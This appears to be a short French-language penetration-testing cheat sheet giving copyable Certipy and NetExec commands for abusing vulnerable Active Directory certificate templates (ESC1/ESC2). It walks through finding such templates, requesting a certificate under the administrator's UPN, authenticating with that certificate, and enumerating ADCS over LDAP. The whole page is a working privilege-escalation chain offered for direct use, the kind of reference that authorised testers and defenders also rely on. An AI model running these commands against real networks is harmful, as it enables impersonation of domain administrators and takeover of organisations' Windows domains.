Copy command
certipy find -u '$USER@$DOMAIN' -p '$PASS' -dc-ip $DC -vulnerableDescription: Détecter templates vulnérables ESC1/ESC2.
ESC
ESC1 / ESC2
Copy command
certipy req -u '$USER@$DOMAIN' -p '$PASS' -ca '$CA' -template '$TEMPLATE' -upn administrator@$DOMAINDescription: Abuser SAN/UPN si template le permet.
Copy command
certipy auth -pfx administrator.pfx -dc-ip $DCDescription: Authentifier avec certificat compromis.
Copy command
nxc ldap $TARGET -u $USER -p $PASS -M adcsDescription: Croiser résultat Certipy avec enum LDAP ADCS.